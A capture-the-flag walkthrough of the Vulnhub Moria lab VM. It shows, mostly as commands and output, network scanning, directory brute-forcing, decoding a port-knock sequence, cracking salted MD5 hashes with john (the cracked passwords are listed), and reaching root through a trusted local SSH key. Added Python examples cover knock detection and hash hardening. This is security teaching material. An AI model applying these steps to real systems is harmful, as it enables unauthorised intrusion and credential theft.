Vulnhub Moria: detailed walkthrough
Moria
Author: Jason_huawen
Basic information about the target
Name: Moria: 1.1
URL:
https://www.vulnhub.com/entry/moria-11,187/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:21:5d:d9 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.253 08:00:27:0f:06:e9 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.253.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-05 06:17 EST
Nmap scan report for bogon (192.168.56.253)
Host is up (0.000090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 47:b5:ed:e3:f9:ad:96:88:c0:f2:83:23:7f:a3:d3:4f (RSA)
| 256 85:cd:a2:d8:bb:85:f6:0f:4e:ae:8c:aa:73:52:ec:63 (ECDSA)
|_ 256 b1:77:7e:08:b3:a0:84:f8:f4:5d:f9:8e:d5:85:b9:34 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Gates of Moria
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
MAC Address: 08:00:27:0F:06:E9 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.34 seconds
The Nmap scan shows three open ports on the target: 21 (FTP), 22 (SSH) and 80 (HTTP).
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ftp 192.168.56.253
Connected to 192.168.56.253.
220 Welcome Balrog!
Name (192.168.56.253:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
The target's FTP service does not allow anonymous logins; whether the "Balrog" in the banner is a user name is not yet clear.
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ gobuster dir -u http://192.168.56.253 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.253
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/05 06:22:52 Starting gobuster in directory enumeration mode
===============================================================
/w (Status: 301) [Size: 232] [--> http://192.168.56.253/w/]
Progress: 217219 / 220561 (98.48%)===============================================================
2022/12/05 06:23:19 Finished
===============================================================
The directory /w was found.
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ curl http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/
Maeglin:"The Balrog is not around, hurry!"
Is Maeglin a user name? An attempt to brute-force the password with hydra failed, though.
URL:
http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/
The content changes on every refresh, so the page is probably reading lines from a file.
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ gobuster dir -u http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,txt,sh
[+] Timeout: 10s
===============================================================
2022/12/05 06:34:51 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 231]
/index.php (Status: 200) [Size: 39]
/random.txt (Status: 200) [Size: 407]
Progress: 16434 / 1102805 (1.49%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
As expected, a file /random.txt turns up:
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ curl http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/random.txt
Balin: "Be quiet, the Balrog will hear you!"
Oin:"Stop knocking!"
Ori:"Will anyone hear us?"
Fundin:"That human will never save us!"
Nain:"Will the human get the message?"
"Eru! Save us!"
"We will die here.."
"Is this the end?"
"Knock knock"
"Too loud!"
Maeglin:"The Balrog is not around, hurry!"
Telchar to Thrain:"That human is slow, don't give up yet"
Dain:"Is that human deaf? Why is it not listening?"
The names appearing in random.txt are probably all user names. Refresh the page while capturing with Wireshark:
The Wireshark Info column reveals a port-knock sequence, in the order 77 101 108 108 111 110 54 57.
These are ASCII codes; decoded they give:
77-M, 101-e, 108-l, 108-l, 111-o, 110-n, 54-6, 57-9
i.e. Mellon69
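As an added example (not part of the original write-up), the following Python reconstructs a knock sequence from a constructed list of SYN records resembling what the Wireshark Info column showed, and decodes the ports as ASCII; the OPEN_PORTS set and the sample records are assumptions built from the page's scan results.

```python
from collections import defaultdict

# Constructed sample modelled on the capture described above: each tuple is
# (timestamp_seconds, src_ip, dst_port). Ports 21/22/80 are the open ports
# from the Nmap scan; SYNs to any other port are candidate knocks.
OPEN_PORTS = {21, 22, 80}
SAMPLE_SYNS = [
    (0.00, "192.168.56.253", 77),
    (0.01, "192.168.56.253", 101),
    (0.02, "192.168.56.253", 108),
    (0.03, "192.168.56.253", 108),
    (0.04, "192.168.56.253", 111),
    (0.05, "192.168.56.253", 110),
    (0.06, "192.168.56.253", 54),
    (0.07, "192.168.56.253", 57),
    (0.50, "192.168.56.1", 80),  # ordinary web request, not a knock
]


def knock_sequences(syns, window=2.0, min_len=4):
    """Group SYNs to closed ports by source address and return, per source,
    the ordered port list when at least `min_len` knocks arrive within
    `window` seconds of the first one. Useful as a detection rule as well:
    a burst of SYNs to closed ports from one host is the knock signature."""
    per_src = defaultdict(list)
    for ts, src, port in sorted(syns):
        if port not in OPEN_PORTS:
            per_src[src].append((ts, port))
    found = {}
    for src, hits in per_src.items():
        start = hits[0][0]
        seq = [p for ts, p in hits if ts - start <= window]
        if len(seq) >= min_len:
            found[src] = seq
    return found


def decode_ports_as_ascii(ports):
    """Moria's knock ports are printable ASCII codes; return the decoded
    string, or None if any port falls outside the printable range."""
    if all(32 <= p <= 126 for p in ports):
        return "".join(chr(p) for p in ports)
    return None
```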
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh balrog@192.168.56.253
The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
ED25519 key fingerprint is SHA256:DS0S3vuDtg8fXxM4SuO7swJktN5DRaID2PhoSxZKb90.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.253' (ED25519) to the list of known hosts.
balrog@192.168.56.253's password:
Permission denied, please try again.
balrog@192.168.56.253's password:
That password is rejected for SSH.
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ftp 192.168.56.253
Connected to 192.168.56.253.
220 Welcome Balrog!
Name (192.168.56.253:kali): Balrog
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11077|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||37021|).
150 Here comes the directory listing.
drwxr-x--- 2 0 1001 27 Mar 14 2017 .
dr-xr-xr-x 18 0 0 258 Mar 14 2017 ..
-rw-r--r-- 1 0 0 1 Apr 28 2017 .bash_history
226 Directory send OK.
ftp> get .bash_history
local: .bash_history remote: .bash_history
229 Entering Extended Passive Mode (|||36051|).
550 Permission denied.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||49993|).
150 Here comes the directory listing.
dr-xr-xr-x 18 0 0 258 Mar 14 2017 .
dr-xr-xr-x 18 0 0 258 Mar 14 2017 ..
-rw-r--r-- 1 0 0 0 Mar 11 2017 .autorelabel
lrwxrwxrwx 1 0 0 7 Mar 11 2017 bin -> usr/bin
dr-xr-xr-x 4 0 0 4096 Mar 11 2017 boot
drwxr-xr-x 20 0 0 3000 Dec 05 19:04 dev
drwxr-xr-x 97 0 0 8192 Dec 05 19:04 etc
drwxr-x--- 4 0 1003 32 Mar 14 2017 home
lrwxrwxrwx 1 0 0 7 Mar 11 2017 lib -> usr/lib
lrwxrwxrwx 1 0 0 9 Mar 11 2017 lib64 -> usr/lib64
drwxr-xr-x 2 0 0 6 Nov 05 2016 media
drwxr-xr-x 2 0 0 6 Nov 05 2016 mnt
drwxr-xr-x 2 0 0 6 Nov 05 2016 opt
drwxr-x--- 2 0 1001 27 Mar 14 2017 prison
dr-xr-xr-x 115 0 0 0 Dec 05 11:04 proc
dr-xr-x--- 8 0 0 276 Mar 13 2017 root
drwxr-xr-x 26 0 0 760 Dec 05 19:04 run
lrwxrwxrwx 1 0 0 8 Mar 11 2017 sbin -> usr/sbin
drwxr-xr-x 2 0 0 6 Nov 05 2016 srv
dr-xr-xr-x 13 0 0 0 Dec 05 19:04 sys
drwxrwxrwt 8 0 0 170 Dec 05 19:48 tmp
drwxr-xr-x 13 0 0 155 Mar 11 2017 usr
drwxr-xr-x 21 0 0 4096 Dec 05 19:04 var
226 Directory send OK.
ftp> cd var
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||16970|).
150 Here comes the directory listing.
drwxr-xr-x 21 0 0 4096 Dec 05 19:04 .
dr-xr-xr-x 18 0 0 258 Mar 14 2017 ..
-rw-r--r-- 1 0 0 163 Mar 11 2017 .updated
drwxr-xr-x 2 0 0 6 Nov 05 2016 adm
drwxr-xr-x 9 0 0 100 Nov 05 2016 cache
drwxr-xr-x 2 0 0 6 Nov 07 2016 crash
drwxr-xr-x 3 0 0 34 Mar 11 2017 db
drwxr-xr-x 3 0 0 18 Nov 05 2016 empty
drwxr-xr-x 3 0 0 17 Nov 05 2016 ftp
drwxr-xr-x 2 0 0 6 Nov 05 2016 games
drwxr-xr-x 2 0 0 6 Nov 05 2016 gopher
drwxr-xr-x 3 0 0 18 Dec 06 2016 kerberos
drwxr-xr-x 39 0 0 4096 Dec 05 19:04 lib
drwxr-xr-x 2 0 0 6 Nov 05 2016 local
lrwxrwxrwx 1 0 0 11 Mar 10 2017 lock -> ../run/lock
drwxr-xr-x 11 0 0 4096 Dec 05 19:04 log
lrwxrwxrwx 1 0 0 10 Mar 11 2017 mail -> spool/mail
drwxr-xr-x 2 0 0 6 Nov 05 2016 nis
drwxr-xr-x 2 0 0 6 Nov 05 2016 opt
drwxr-xr-x 2 0 0 6 Nov 05 2016 preserve
lrwxrwxrwx 1 0 0 6 Mar 10 2017 run -> ../run
drwxr-xr-x 8 0 0 87 Nov 05 2016 spool
drwxrwxrwt 3 0 0 83 Dec 05 19:04 tmp
drwxr-xr-x 4 0 0 33 Nov 14 2016 www
drwxr-xr-x 2 0 0 6 Nov 05 2016 yp
226 Directory send OK.
ftp> cd www
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||55343|).
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 33 Nov 14 2016 .
drwxr-xr-x 21 0 0 4096 Dec 05 19:04 ..
drwxr-xr-x 2 0 0 6 Nov 14 2016 cgi-bin
drwxr-xr-x 4 0 0 89 Mar 14 2017 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||22086|).
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 89 Mar 14 2017 .
drwxr-xr-x 4 0 0 33 Nov 14 2016 ..
drwxr-xr-x 2 0 0 23 Mar 12 2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r-------- 1 48 48 85 Mar 12 2017 index.php
-r-------- 1 48 48 161595 Mar 11 2017 moria.jpg
drwxr-xr-x 3 0 0 15 Mar 12 2017 w
226 Directory send OK.
ftp> cd QlVraKW4fbIkXau9zkAPNGzviT3UKntl
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||43440|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 23 Mar 12 2017 .
drwxr-xr-x 4 0 0 89 Mar 14 2017 ..
-rw-r--r-- 1 0 0 1672 Mar 12 2017 index.php
226 Directory send OK.
ftp> cat index.php
?Invalid command.
ftp> get index.php
local: index.php remote: index.php
229 Entering Extended Passive Mode (|||59424|).
550 Permission denied.
ftp>
It cannot be downloaded over FTP, but since it sits under the web root, check whether the browser can reach it:
The page lists user names together with hashed passwords,
and its source contains a comment:
<!--
6MAp84
bQkChe
HnqeN4
e5ad5s
g9Wxv7
HCCsxP
cC5nTr
h8spZR
tb9AWe
MD5(MD5(Password).Salt)
So the salt and the hashing algorithm for every password are known.
Combine the hashes and salts into one file:
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ cat Usernameandpassword
Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ john -format=dynamic_6 Usernameandpassword
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 23 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 18 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 14 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 18 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 33 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 28 candidates buffered for the current salt, minimum 48 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
flower (Balin)
warrior (Nain)
spanky (Ori)
rainbow (Oin)
abcdef (Dain)
fuckoff (Maeglin)
darkness (Thrain)
magic (Telchar)
hunter2 (Fundin)
9g 0:00:00:00 DONE 2/3 (2022-12-05 06:58) 128.5g/s 545357p/s 932557c/s 932557C/s PHOENIX..kids2
Use the "--show --format=dynamic_6" options to display all of the cracked passwords reliably
Session completed.
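The MD5(MD5(Password).Salt) scheme from the page comment, as an added example (not the page's or the VM's own code): weak_verify checks the Balin entry from the hash file against the password john recovered, and strong_hash/strong_verify show the hardened form with a slow KDF and a random per-user salt; the scrypt parameters are assumptions.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple


def weak_verify(password: str, salt: str, hex_digest: str) -> bool:
    """Moria's scheme, MD5(MD5(password).salt), with the inner MD5 as a
    lowercase hex string (what PHP md5() and john's dynamic_6 produce).
    Fast, unsalted inner hash and a short salt: cheap to crack offline."""
    inner = hashlib.md5(password.encode()).hexdigest()
    outer = hashlib.md5((inner + salt).encode()).hexdigest()
    return hmac.compare_digest(outer, hex_digest.lower())


def parse_entry(line: str) -> Tuple[str, str, str]:
    """Parse one 'user:hash$salt' line in the format of the page's file."""
    user, rest = line.strip().split(":", 1)
    digest, salt = rest.split("$", 1)
    return user, digest, salt


# Entry copied from the hash file shown above.
BALIN = "Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84"


def strong_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Hardened replacement: scrypt with a 16-byte random per-user salt.
    Work factor (n=2**14, r=8, p=1) is an assumed illustrative setting."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest


def strong_verify(password: str, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison against a stored scrypt digest."""
    return hmac.compare_digest(strong_hash(password, salt)[1], digest)
```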
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh Balin@192.168.56.253
Balin@192.168.56.253's password:
Permission denied, please try again.
Balin@192.168.56.253's password:
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh warrior@192.168.56.253
warrior@192.168.56.253's password:
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh Nain@192.168.56.253
Nain@192.168.56.253's password:
Permission denied, please try again.
Nain@192.168.56.253's password:
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh Ori@192.168.56.253
Ori@192.168.56.253's password:
Last login: Sun Mar 12 22:57:09 2017
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
-bash-4.2$
Privilege escalation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison
-bash-4.2$ cat know_hosts
cat: know_hosts: No such file or directory
-bash-4.2$ cat known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
known_hosts shows that this account has previously connected to 127.0.0.1 over SSH, so try that as root:
-bash-4.2$ ssh root@127.0.0.1
Last failed login: Mon Dec 5 15:01:17 EST 2022 from 192.168.56.253 on ssh:notty
There were 3 failed login attempts since the last successful login.
Last login: Fri Apr 28 18:01:27 2017
[root@Moria ~]# cd /root
[root@Moria ~]# ls -alh
total 52K
dr-xr-x---. 8 root root 276 Mar 12 2017 .
dr-xr-xr-x. 18 root root 258 Mar 14 2017 ..
-rw-r--r-- 1 root root 21 Mar 12 2017 0
-rw-------. 1 root root 1.3K Mar 9 2017 anaconda-ks.cfg
-rw-------. 1 root root 78 Apr 28 2017 .bash_history
-rw-r--r-- 1 root root 18 Dec 28 2013 .bash_logout
-rw-r--r-- 1 root root 176 Dec 28 2013 .bash_profile
-rw-r--r-- 1 root root 176 Dec 28 2013 .bashrc
drwx------. 7 root root 86 Mar 9 2017 .cache
drwxr-xr-x. 10 root root 128 Mar 9 2017 .config
-rw-r--r-- 1 root root 100 Dec 28 2013 .cshrc
drwxr-xr-x. 2 root root 6 Mar 9 2017 Desktop
-rw-r--r-- 1 root root 439 Mar 13 2017 flag.txt
-rw-r--r-- 1 root root 20 Mar 11 2017 hosts
-rw-------. 1 root root 8.5K Mar 12 2017 .ICEauthority
drwx------. 3 root root 19 Mar 9 2017 .local
drwxr-----. 3 root root 19 Mar 11 2017 .pki
drwx------ 2 root root 48 Mar 12 2017 .ssh
-rw-r--r-- 1 root root 129 Dec 28 2013 .tcshrc
[root@Moria ~]# cat flag.txt
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.
From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.”
All That is Gold Does Not Glitter by J. R. R. Tolkien
I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy
[root@Moria ~]#
STRIVE FOR PROGRESS, NOT FOR PERFECTION